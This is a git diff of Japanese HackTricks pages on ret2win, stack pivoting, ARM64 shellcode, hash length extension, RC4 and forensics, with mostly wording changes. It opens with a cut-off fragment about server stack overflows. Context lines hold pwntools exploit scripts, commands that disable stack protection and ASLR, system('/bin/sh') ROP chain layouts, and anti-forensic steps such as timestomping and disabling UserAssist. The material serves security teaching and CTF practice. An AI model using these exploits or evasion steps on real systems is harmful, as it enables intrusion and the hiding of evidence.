APIを通じて到達可能な複数の**スタックベースのオーバーフロー**が含まれていました。脆弱なパターンは`http_server.cc`と`sagemaker_server.cc`に繰り返し現れました: ```c int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0); if (n > 0) { diff --git a/src/binary-exploitation/stack-overflow/ret2win/README.md b/src/binary-exploitation/stack-overflow/ret2win/README.md index abca067f5..405d391c2 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/README.md +++ b/src/binary-exploitation/stack-overflow/ret2win/README.md @@ -4,11 +4,11 @@ ## 基本情報 -**Ret2win** チャレンジは、特に **バイナリエクスプロイト** を含むタスクにおいて、**Capture The Flag (CTF)** コンペティションで人気のあるカテゴリーです。目標は、特定の未呼び出しの関数をバイナリ内で実行するために、与えられたバイナリの脆弱性を悪用することです。この関数は通常、`win`、`flag` などの名前が付けられています。この関数が実行されると、通常はフラグや成功メッセージが出力されます。チャレンジは通常、スタック上の **リターンアドレス** を上書きして、実行フローを目的の関数に転送することを含みます。以下は、例を交えた詳細な説明です。 +**Ret2win** チャレンジは、特に **バイナリエクスプロイト** を含むタスクにおいて、**Capture The Flag (CTF)** コンペティションで人気のあるカテゴリーです。目標は、与えられたバイナリの脆弱性を悪用して、バイナリ内の特定の未呼び出しの関数を実行することです。この関数は通常、`win`、`flag` などの名前が付けられています。この関数が実行されると、通常はフラグや成功メッセージが出力されます。チャレンジは通常、スタック上の **リターンアドレス** を上書きして、実行フローを目的の関数に転送することを含みます。以下は、例を交えた詳細な説明です。 ### Cの例 -脆弱性を持つシンプルなCプログラムと、呼び出すことを意図している `win` 関数を考えてみましょう: +脆弱性を持つシンプルなCプログラムと、呼び出すことを意図している `win` 関数を考えてみましょう: ```c #include #include @@ -27,13 +27,13 @@ vulnerable_function(); return 0; } ``` -このプログラムをスタック保護なしで、かつ**ASLR**を無効にしてコンパイルするには、次のコマンドを使用できます: +このプログラムをスタック保護なしで、**ASLR** を無効にしてコンパイルするには、次のコマンドを使用できます: ```sh gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c ``` - `-m32`: プログラムを32ビットバイナリとしてコンパイルします(これはオプションですが、CTFチャレンジでは一般的です)。 - `-fno-stack-protector`: スタックオーバーフローに対する保護を無効にします。 -- `-z execstack`: スタック上でのコードの実行を許可します。 +- `-z execstack`: スタック上のコードの実行を許可します。 - `-no-pie`: 位置独立実行可能ファイルを無効にして、`win`関数のアドレスが変更されないようにします。 - `-o vulnerable`: 出力ファイルの名前を`vulnerable`にします。 @@ -59,7 +59,7 @@ payload = b'A' * 68 + win_addr p.sendline(payload) p.interactive() ``` -`win`関数のアドレスを見つけるには、**gdb**、**objdump**、またはバイナリファイルを検査できる他のツールを使用できます。例えば、`objdump`を使用して、次のようにできます: +`win`関数のアドレスを見つけるには、**gdb**、**objdump**、またはバイナリファイルを検査できる他のツールを使用できます。例えば、`objdump`を使用して次のようにできます: ```sh objdump -d vulnerable | grep win ``` @@ -69,7 +69,7 @@ Python スクリプトは、`vulnerable_function` によって処理されると ## 保護 -- [**PIE**](../../common-binary-protections-and-bypasses/pie/index.html) **は無効にするべきです**。そうしないと、実行ごとにアドレスが信頼できなくなり、関数が格納されるアドレスが常に同じではなくなり、`win` 関数がどこにロードされているかを把握するために何らかのリークが必要になります。オーバーフローを引き起こす関数が `read` やそれに類似するものである場合、リターンアドレスを `win` 関数に変更するために 1 または 2 バイトの **部分上書き** を行うことができます。ASLR の動作のため、最後の 3 つの16進数ニブルはランダム化されないため、正しいリターンアドレスを取得する確率は **1/16**(1 ニブル)です。 +- [**PIE**](../../common-binary-protections-and-bypasses/pie/index.html) **は無効にするべきです**。そうしないと、アドレスが実行ごとに信頼できなくなり、関数が格納されるアドレスが常に同じではなくなり、`win` 関数がどこにロードされているかを把握するために何らかのリークが必要になります。オーバーフローを引き起こす関数が `read` やそれに類似するものである場合、リターンアドレスを `win` 関数に変更するために 1 または 2 バイトの **部分上書き** を行うことができます。ASLR の動作のため、最後の 3 つの16進数ニブルはランダム化されないため、正しいリターンアドレスを取得する確率は **1/16**(1 ニブル)です。 - [**スタックカナリア**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) も無効にするべきです。そうしないと、侵害された EIP リターンアドレスは決して追跡されません。 ## その他の例と参考文献 @@ -82,7 +82,7 @@ Python スクリプトは、`vulnerable_function` によって処理されると - [https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html) - 64ビット、ASLRなし - [https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html) -- 32ビット、ASLRなし、ダブルスモールオーバーフロー、最初にスタックをオーバーフローさせ、2回目のオーバーフローのサイズを拡大 +- 32ビット、ASLRなし、ダブル小オーバーフロー、最初にスタックをオーバーフローさせ、2回目のオーバーフローのサイズを大きくする - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html) - 32ビット、relro、カナリアなし、nx、pieなし、`fflush` のアドレスを `win` 関数(ret2win)で上書きするフォーマット文字列 - [https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html](https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html) @@ -90,7 +90,7 @@ Python スクリプトは、`vulnerable_function` によって処理されると - [https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html](https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html) - 32ビット、nx、他に何もなし、`win` 関数を呼び出すための EIP の部分上書き(1バイト) - [https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html) -- プログラムは、入力のサイズを確認するために数値の最後のバイトのみを検証しているため、最後のバイトが許可された範囲内であれば、任意のサイズを追加することが可能です。その後、入力は ret2win を利用したバッファオーバーフローを引き起こします。 +- プログラムは、入力のサイズをチェックするために数値の最後のバイトのみを検証しているため、最後のバイトが許可された範囲内であれば、任意のサイズを追加することが可能です。その後、入力は ret2win を利用したバッファオーバーフローを引き起こします。 - [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/) - 64ビット、relro、カナリアなし、nx、pie。`win` 関数(ret2win)を呼び出すための部分上書き - [https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/](https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/) @@ -100,6 +100,7 @@ Python スクリプトは、`vulnerable_function` によって処理されると ## ARM64 の例 + {{#ref}} ret2win-arm64.md {{#endref}} diff --git a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md index fdde1da7e..11ee59fc7 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md +++ b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md @@ -2,7 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -arm64の紹介は以下を参照してください: +arm64の紹介を見つけるには: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md @@ -37,7 +38,7 @@ clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie この例は [**GEF**](https://github.com/bata24/gef) を使用して作成されました: -gefでgdbを起動し、パターンを作成して使用します: +gefを使用してgdbを起動し、パターンを作成して使用します: ```bash gdb -q ./ret2win pattern create 200 @@ -113,7 +114,7 @@ p.close() ### Off-by-1 -実際、これはスタックに保存されたPCでオフバイ-2のようになります。すべてのリターンアドレスを上書きするのではなく、**最後の2バイトだけ**を`0x06c4`で上書きします。 +実際には、これはスタックに保存されたPCでオフバイ-2のようになります。すべてのリターンアドレスを上書きするのではなく、**最後の2バイトだけ**を`0x06c4`で上書きします。 ```python from pwn import * @@ -135,12 +136,12 @@ p.close() ```
-ARM64の別のオフバイワンの例は、[https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/)で見つけることができます。これは架空の脆弱性における実際のオフバイ-**ワン**です。 +ARM64の別のオフバイワンの例は[https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/)で見つけることができ、これは架空の脆弱性における実際のオフバイ-**ワン**です。 -## PIEあり +## PIEを使用して > [!TIP] -> バイナリを**`-no-pie`引数なしでコンパイルしてください** +> バイナリを**`-no-pie`引数なしでコンパイルする** ### オフバイ-2 diff --git a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md index 72e10d38f..6add05593 100644 --- a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md +++ b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md @@ -6,40 +6,40 @@ この技術は、**ベースポインタ(EBP/RBP)**を操作する能力を利用して、フレームポインタと**`leave; ret`**命令シーケンスを慎重に使用することで、複数の関数の実行をチェーンするものです。 -おさらいとして、x86/x86-64において**`leave`**は次のように等価です: +おさらいとして、x86/x86-64において**`leave`**は次のように等価です: ``` mov rsp, rbp ; mov esp, ebp on x86 pop rbp ; pop ebp on x86 ret ``` -そして、保存された **EBP/RBP がスタック内で保存された EIP/RIP の前にあるため**、スタックを制御することでそれを制御することが可能です。 +そして、保存された **EBP/RBP がスタック内で** 保存された EIP/RIP の前にあるため、スタックを制御することでそれを制御することが可能です。 > 注意 > - 64ビットでは、EBP→RBP および ESP→RSP に置き換えます。意味は同じです。 -> - 一部のコンパイラはフレームポインタを省略します(「EBP が使用されない可能性がある」を参照)。その場合、`leave` が表示されない可能性があり、この技術は機能しません。 +> - 一部のコンパイラはフレームポインタを省略します(「EBP が使用されない可能性があります」を参照)。その場合、`leave` が表示されない可能性があり、この技術は機能しません。 ### EBP2Ret この技術は、**保存された EBP/RBP を変更できるが、EIP/RIP を直接変更する方法がない**場合に特に有用です。関数のエピローグの動作を利用します。 -`fvuln` の実行中に、シェルコード/ROP チェーンのアドレスがあるメモリ領域を指す **偽の EBP** をスタックに注入することに成功すれば(amd64 では 8 バイト / x86 では 4 バイトの `pop` を考慮)、RIP を間接的に制御できます。関数が戻ると、`leave` が RSP を作成した位置に設定し、その後の `pop rbp` が RSP を減少させ、**攻撃者がそこに保存したアドレスを指すようにします**。その後、`ret` はそのアドレスを使用します。 +`fvuln` の実行中に、シェルコード/ROP チェーンのアドレスがあるメモリ領域を指す **偽の EBP** をスタックに注入することに成功すれば(amd64 では 8 バイト / x86 では 4 バイトの `pop` を考慮)、RIP を間接的に制御できます。関数が戻ると、`leave` が RSP を作成された位置に設定し、その後の `pop rbp` が RSP を減少させ、**攻撃者によってそこに保存されたアドレスを指すようになります**。その後、`ret` はそのアドレスを使用します。 -**2 つのアドレスを知っておく必要があることに注意してください**: ESP/RSP が移動するアドレスと、そのアドレスに `ret` が消費する値です。 +**2 つのアドレスを知る必要があることに注意してください**: ESP/RSP が移動するアドレスと、そのアドレスに `ret` が消費する値です。 -#### エクスプロイト構築 +#### 攻撃構築 -まず、**任意のデータ/アドレスを書き込むことができるアドレス**を知っておく必要があります。RSP はここを指し、**最初の `ret` を消費します**。 +まず、**任意のデータ/アドレスを書き込むことができるアドレス**を知る必要があります。RSP はここを指し、**最初の `ret` を消費します**。 -次に、**実行を転送する**ために `ret` が使用するアドレスを選択する必要があります。次のようなものを使用できます: +次に、**実行を転送する**ために `ret` が使用するアドレスを選択する必要があります。次のように使用できます: - 有効な [**ONE_GADGET**](https://github.com/david942j/one_gadget) アドレス。 -- **`system()`** のアドレス、その後に適切な戻り値と引数(x86 の場合: `ret` ターゲット = `&system`、次に 4 バイトのジャンク、次に `&"/bin/sh"`)。 -- **`jmp esp;`** ガジェットのアドレス([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md))その後にインラインシェルコード。 +- 適切な戻り値と引数に続く **`system()`** のアドレス(x86 の場合: `ret` ターゲット = `&system`、次に 4 バイトのジャンク、次に `&"/bin/sh"`)。 +- インラインシェルコードに続く **`jmp esp;`** ガジェット ([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md)) のアドレス。 - 書き込み可能なメモリにステージされた [**ROP**](../rop-return-oriented-programing/index.html) チェーン。 -これらのアドレスの前には、制御された領域に **`pop ebp/rbp`** のためのスペースが必要です(amd64 では 8B、x86 では 4B)。これらのバイトを悪用して **2 番目の偽 EBP** を設定し、最初の呼び出しが戻った後も制御を維持できます。 +これらのアドレスの前には、**`leave` からの `pop ebp/rbp` のためのスペースが必要です**(amd64 では 8B、x86 では 4B)。これらのバイトを悪用して、**2 番目の偽の EBP** を設定し、最初の呼び出しが戻った後も制御を維持できます。 -#### Off-By-One エクスプロイト +#### Off-By-One 攻撃 保存された EBP/RBP の最下位バイトのみを **変更できる** 場合に使用されるバリアントがあります。この場合、**`ret`** でジャンプするアドレスを格納するメモリ位置は、元の EBP/RBP と最初の 3 バイト/5 バイトを共有する必要があるため、1 バイトの上書きでリダイレクトできます。通常、低バイト(オフセット 0x00)は、近くのページ/整列された領域内でできるだけ遠くにジャンプするために増加します。 @@ -51,12 +51,12 @@ ret これで `RSP` が制御され、次の命令は `ret` です。制御されたメモリに次のようなものを配置します: -- `&(次の偽 EBP)` -> `leave` から `pop ebp/rbp` によって読み込まれます。 +- `&(次の偽の EBP)` -> `leave` から `pop ebp/rbp` によって読み込まれます。 - `&system()` -> `ret` によって呼び出されます。 -- `&(leave;ret)` -> `system` が終了した後、RSP を次の偽 EBP に移動させ、続行します。 +- `&(leave;ret)` -> `system` が終了した後、RSP を次の偽の EBP に移動させ、続行します。 - `&("/bin/sh")` -> `system` の引数。 -このようにして、プログラムのフローを制御するために複数の偽 EBP をチェーンすることが可能です。 +このようにして、プログラムのフローを制御するために複数の偽の EBP をチェーンすることが可能です。 これは [ret2lib](../rop-return-oriented-programing/ret2lib/index.html) のようなものですが、より複雑で、エッジケースでのみ有用です。 @@ -174,7 +174,7 @@ pause() p.sendline(payload) print(p.recvline()) ``` -### xchg , rsp ガジェット +### xchg , rsp gadget ``` pop <=== return pointer @@ -182,7 +182,8 @@ xchg , rsp ``` ### jmp esp -ret2espテクニックについては、こちらを確認してください: +ret2espテクニックについては、こちらを確認してください: + {{#ref}} ../rop-return-oriented-programing/ret2esp-ret2reg.md @@ -194,9 +195,9 @@ ret2espテクニックについては、こちらを確認してください: - `leave ; ret` 関数またはライブラリ内 - `pop rsp` / `xchg rax, rsp ; ret` -- `add rsp, ; ret` (または x86 では `add esp, ; ret`) +- `add rsp, ; ret` (または `add esp, ; ret` x86の場合) -例: +例: ```bash # Ropper ropper --file ./vuln --search "leave; ret" @@ -248,7 +249,7 @@ grep -E 'x86_Thread_features' /proc/$$/status # expect: shstk (and possibly wr ARM64では、関数の**プロローグとエピローグ**は**スタックにSPレジスタを保存および取得しません**。さらに、**`RET`**命令はSPが指すアドレスに戻るのではなく、**`x30`**内のアドレスに戻ります。 -したがって、デフォルトでは、エピローグを悪用するだけでは、スタック内のデータを上書きすることによって**SPレジスタを制御することはできません**。そして、たとえSPを制御できたとしても、**`x30`**レジスタを**制御する方法**がまだ必要です。 +したがって、デフォルトでは、エピローグを悪用するだけでは、スタック内のデータを上書きすることで**SPレジスタを制御することはできません**。そして、たとえSPを制御できたとしても、**`x30`**レジスタを**制御する方法**がまだ必要です。 - プロローグ @@ -267,10 +268,11 @@ ret ``` > [!CAUTION] -> ARM64でスタックピボティングに似たことを行う方法は、**`SP`**を**制御できること**(`SP`に渡される値を持つレジスタを制御するか、何らかの理由で`SP`がスタックからアドレスを取得しており、オーバーフローがある場合)であり、その後**エピローグを悪用**して**制御された`SP`から**`x30`**レジスタをロードし、**`RET`**します。 +> ARM64でスタックピボティングに似たことを行う方法は、**`SP`**を**制御すること**(`SP`に渡される値を持つレジスタを制御するか、何らかの理由で`SP`がスタックからアドレスを取得しており、オーバーフローがある場合)であり、その後**エピローグを悪用して**、**制御された`SP`**から**`x30`**レジスタをロードし、**`RET`**をそれに戻すことです。 次のページでは、**ARM64におけるRet2espの同等物**を見ることができます: + {{#ref}} ../rop-return-oriented-programing/ret2esp-ret2reg.md {{#endref}} @@ -280,9 +282,9 @@ ret - [https://bananamafia.dev/post/binary-rop-stackpivot/](https://bananamafia.dev/post/binary-rop-stackpivot/) - [https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting) - [https://guyinatuxedo.github.io/17-stack_pivot/dcquals19_speedrun4/index.html](https://guyinatuxedo.github.io/17-stack_pivot/dcquals19_speedrun4/index.html) -- 64ビット、リターンスレッドで始まるROPチェーンによるオフバイワンの悪用 +- 64ビット、retスレッドで始まるropチェーンを使用したオフバイワンの悪用 - [https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html](https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html) -- 64ビット、relroなし、カナリア、nxおよびpie。プログラムはスタックまたはpieのリークとqwordのWWWを提供します。最初にスタックリークを取得し、WWWを使用して戻ってpieリークを取得します。次に、WWWを使用して`.fini_array`エントリを悪用し、`__libc_csu_fini`を呼び出して永続ループを作成します([詳細はこちら](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md))。この「永続的」な書き込みを悪用して、.bssにROPチェーンが書き込まれ、RBPでピボティングして呼び出されます。 +- 64ビット、relroなし、カナリア、nxおよびpie。プログラムはスタックまたはpieのリークとqwordのWWWを許可します。最初にスタックリークを取得し、WWWを使用して戻ってpieリークを取得します。次に、WWWを使用して`.fini_array`エントリを悪用し、`__libc_csu_fini`を呼び出して永続ループを作成します([詳細はこちら](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md))。この「永続的」な書き込みを悪用して、.bssにROPチェーンが書き込まれ、RBPでピボティングして呼び出されます。 - Linuxカーネルドキュメント: 制御フロー強制技術(CET)シャドウスタック — SHSTK、`nousershstk`、`/proc/$PID/status`フラグ、および`arch_prctl`を介しての有効化の詳細。 https://www.kernel.org/doc/html/next/x86/shstk.html - Microsoft Learn: カーネルモードハードウェア強制スタック保護(WindowsのCETシャドウスタック)。 https://learn.microsoft.com/en-us/windows-server/security/kernel-mode-hardware-stack-protection diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md index 3575edd2b..8745bb7e0 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md @@ -2,7 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -arm64の紹介は以下を参照してください: +arm64の紹介を見つけるには: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md @@ -23,13 +24,13 @@ vulnerable_function(); return 0; } ``` -PIE、カナリア、NXなしでコンパイル: +PIE、カナリア、NXなしでコンパイル: ```bash clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack ``` ## No ASLR & No canary - Stack Overflow -ASLRを停止するには、次のコマンドを実行します: +ASLRを停止するには、次を実行します: ```bash echo 0 | sudo tee /proc/sys/kernel/randomize_va_space ``` diff --git a/src/crypto-and-stego/esoteric-languages.md b/src/crypto-and-stego/esoteric-languages.md index 40cea8b1f..db5952099 100644 --- a/src/crypto-and-stego/esoteric-languages.md +++ b/src/crypto-and-stego/esoteric-languages.md @@ -4,7 +4,7 @@ ## [Esolangs Wiki](https://esolangs.org/wiki/Main_Page) -このウィキをチェックして、より多くのエソテリック言語を検索してください。 +そのウィキをチェックして、より多くのエソテリック言語を検索してください。 ## Malbolge ``` diff --git a/src/crypto-and-stego/hash-length-extension-attack.md b/src/crypto-and-stego/hash-length-extension-attack.md index bb7654c79..5ea12f68c 100644 --- a/src/crypto-and-stego/hash-length-extension-attack.md +++ b/src/crypto-and-stego/hash-length-extension-attack.md @@ -4,28 +4,28 @@ ## 攻撃の概要 -サーバーが**データ**に**秘密**を**追加**してからそのデータをハッシュ化して**署名**していると想像してください。もしあなたが以下を知っているなら: +サーバーが**データ**に**秘密**を**追加**して、既知の平文データをハッシュ化して**署名**していると想像してください。もしあなたが以下を知っているなら: -- **秘密の長さ**(これは与えられた長さの範囲からもブルートフォース可能です) +- **秘密の長さ**(これは与えられた長さの範囲からブルートフォースで求めることもできます) - **平文データ** -- **アルゴリズム(そしてそれがこの攻撃に対して脆弱であること)** -- **パディングが知られていること** -- 通常はデフォルトのものが使用されるため、他の3つの要件が満たされていれば、これもそうです +- **アルゴリズム(そしてそれがこの攻撃に対して脆弱である)** +- **パディングが知られている** +- 通常はデフォルトのものが使用されるので、他の3つの要件が満たされていれば、これもそうです - パディングは秘密+データの長さによって異なるため、秘密の長さが必要です その場合、**攻撃者**は**データ**を**追加**し、**以前のデータ + 追加されたデータ**の有効な**署名**を**生成**することが可能です。 ### どうやって? -基本的に、脆弱なアルゴリズムは最初に**データのブロックをハッシュ化**し、その後、**以前に**作成された**ハッシュ**(状態)から**次のデータのブロックを追加**して**ハッシュ化**します。 +基本的に、脆弱なアルゴリズムは、最初に**データのブロックをハッシュ化**し、その後、**以前に作成されたハッシュ**(状態)から**次のデータのブロックを追加**して**ハッシュ化**します。 例えば、秘密が「secret」でデータが「data」の場合、「secretdata」のMD5は6036708eba0d11f6ef52ad44e8b74d5bです。\ 攻撃者が「append」という文字列を追加したい場合、彼は以下のことができます: -- 64の「A」のMD5を生成する +- 64個の「A」のMD5を生成する - 以前に初期化されたハッシュの状態を6036708eba0d11f6ef52ad44e8b74d5bに変更する - 文字列「append」を追加する -- ハッシュを完了し、結果のハッシュは「secret」 + 「data」 + 「padding」 + 「append」の**有効なもの**になります +- ハッシュを完了させ、その結果のハッシュは「secret」 + 「data」 + 「padding」 + 「append」の**有効なもの**になります ### **ツール** @@ -35,6 +35,6 @@ https://github.com/iagox86/hash_extender ### 参考文献 -この攻撃については[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)でよく説明されています。 +この攻撃については、[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)でよく説明されています。 {{#include ../banners/hacktricks-training.md}} diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index b6ef2ef45..4081d6a42 100644 --- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -1,8 +1,10 @@ +# RC4 Encrypt and Decrypt + {{#include ../banners/hacktricks-training.md}} -もしRC4を使用してプレーンテキストを暗号化できれば、同じパスワードを使用してそのRC4によって暗号化された任意のコンテンツを暗号化関数を使って復号化できます。 +もしあなたがRC4を使用してプレーンテキストを暗号化できるなら、同じパスワードを使用してそのRC4によって暗号化された任意のコンテンツを暗号化関数を使って復号化することができます。 -既知のプレーンテキストを暗号化できれば、パスワードを抽出することも可能です。詳細なリファレンスはHTB Kryptosマシンで見つけることができます: +既知のプレーンテキストを暗号化できる場合、パスワードを抽出することも可能です。詳細なリファレンスはHTB Kryptosマシンで見つけることができます: {{#ref}} https://0xrick.github.io/hack-the-box/kryptos/ diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md index 7199b960a..df0f2ba26 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md @@ -4,13 +4,15 @@ ## イメージの作成とマウント + {{#ref}} ../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md {{#endref}} ## マルウェア分析 -これは**イメージを取得した後に最初に行うべきステップではありません**。しかし、ファイル、ファイルシステムイメージ、メモリイメージ、pcapなどがある場合は、このマルウェア分析技術を独立して使用できますので、これらのアクションを**念頭に置いておくことが重要です**: +これは**イメージを取得した後に最初に行うべきステップではありません**。しかし、ファイル、ファイルシステムイメージ、メモリイメージ、pcapなどがある場合は、このマルウェア分析技術を独立して使用できますので、**これらのアクションを念頭に置いておくことが重要です**。 + {{#ref}} malware-analysis.md @@ -18,22 +20,26 @@ malware-analysis.md ## イメージの検査 -デバイスの**フォレンジックイメージ**が提供された場合、**パーティションやファイルシステム**を**分析**し、潜在的に**興味深いファイル**(削除されたものも含む)を**回復**し始めることができます。方法を学ぶには: +デバイスの**フォレンジックイメージ**が与えられた場合、**パーティションやファイルシステム**を**分析し**、潜在的に**興味深いファイル**(削除されたものも含む)を**回復する**ことができます。方法を学ぶには以下を参照してください。 + {{#ref}} partitions-file-systems-carving/ {{#endref}} -使用されるOSやプラットフォームによって、異なる興味深いアーティファクトを検索する必要があります: +使用されるOSやプラットフォームによって、異なる興味深いアーティファクトを検索する必要があります。 + {{#ref}} windows-forensics/ {{#endref}} + {{#ref}} linux-forensics.md {{#endref}} + {{#ref}} docker-forensics.md {{#endref}} @@ -41,13 +47,15 @@ docker-forensics.md ## 特定のファイルタイプとソフトウェアの深い検査 非常に**疑わしい****ファイル**がある場合、**ファイルタイプとそれを作成したソフトウェア**に応じて、いくつかの**トリック**が役立つかもしれません。\ -興味深いトリックを学ぶには、以下のページをお読みください: +興味深いトリックを学ぶには以下のページをお読みください。 + {{#ref}} specific-software-file-type-tricks/ {{#endref}} -特に言及したいページがあります: +特に言及したいページがあります。 + {{#ref}} specific-software-file-type-tricks/browser-artifacts.md @@ -55,19 +63,22 @@ specific-software-file-type-tricks/browser-artifacts.md ## メモリダンプの検査 + {{#ref}} memory-dump-analysis/ {{#endref}} ## Pcapの検査 + {{#ref}} pcap-inspection/ {{#endref}} ## **アンチフォレンジック技術** -アンチフォレンジック技術の使用の可能性を念頭に置いてください: +アンチフォレンジック技術の使用の可能性を念頭に置いてください。 + {{#ref}} anti-forensic-techniques.md @@ -75,6 +86,7 @@ anti-forensic-techniques.md ## 脅威ハンティング + {{#ref}} file-integrity-monitoring.md {{#endref}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md index 453522c8f..b5db54162 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md @@ -4,7 +4,7 @@ ## タイムスタンプ -攻撃者は、**ファイルのタイムスタンプを変更すること**に興味を持つかもしれません。\ +攻撃者は**ファイルのタイムスタンプを変更すること**に興味を持つかもしれません。\ タイムスタンプは、MFT内の属性`$STANDARD_INFORMATION` \_\_ と \_\_ `$FILE_NAME`に見つけることができます。 両方の属性には4つのタイムスタンプがあります: **変更**, **アクセス**, **作成**, および **MFTレジストリ変更** (MACEまたはMACB)。 @@ -13,7 +13,7 @@ ### TimeStomp - アンチフォレンジックツール -このツールは、**`$STANDARD_INFORMATION`**内のタイムスタンプ情報を**変更**しますが、**`$FILE_NAME`**内の情報は**変更しません**。したがって、**疑わしい** **活動を特定することが可能です**。 +このツールは**`$STANDARD_INFORMATION`**内のタイムスタンプ情報を**変更**しますが、**`$FILE_NAME`**内の情報は**変更しません**。したがって、**疑わしい** **活動を特定することが可能です**。 ### Usnjrnl @@ -25,7 +25,7 @@ ### $LogFile -**ファイルシステムへのすべてのメタデータ変更は、**[write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging)として知られるプロセスでログに記録されます。ログに記録されたメタデータは、NTFSファイルシステムのルートディレクトリにある`**$LogFile**`という名前のファイルに保持されます。[LogFileParser](https://github.com/jschicht/LogFileParser)のようなツールを使用して、このファイルを解析し、変更を特定できます。 +**ファイルシステムへのすべてのメタデータ変更は**、[書き込み先行ログ](https://en.wikipedia.org/wiki/Write-ahead_logging)として知られるプロセスで記録されます。記録されたメタデータは、NTFSファイルシステムのルートディレクトリにある`**$LogFile**`という名前のファイルに保持されます。[LogFileParser](https://github.com/jschicht/LogFileParser)のようなツールを使用して、このファイルを解析し、変更を特定できます。 ![](<../../images/image (137).png>) @@ -98,9 +98,9 @@ UserAssistを無効にするには、2つのステップが必要です: - 各々の値を1(または3)から0に変更するために修正を選択 - 再起動 -### タイムスタンプの無効化 - 最終アクセス時間 +### タイムスタンプの無効化 - 最終アクセス時刻 -NTFSボリュームからフォルダーが開かれるたびに、システムは各リストされたフォルダーの**タイムスタンプフィールドを更新するための時間を取ります**。これは、最終アクセス時間と呼ばれます。NTFSボリュームが頻繁に使用される場合、これがパフォーマンスに影響を与える可能性があります。 +NTFSボリュームからフォルダーが開かれるたびに、システムは各リストされたフォルダーの**タイムスタンプフィールドを更新するための時間を取ります**。これは、最終アクセス時刻と呼ばれます。NTFSボリュームが頻繁に使用される場合、これがパフォーマンスに影響を与える可能性があります。 1. レジストリエディタを開く 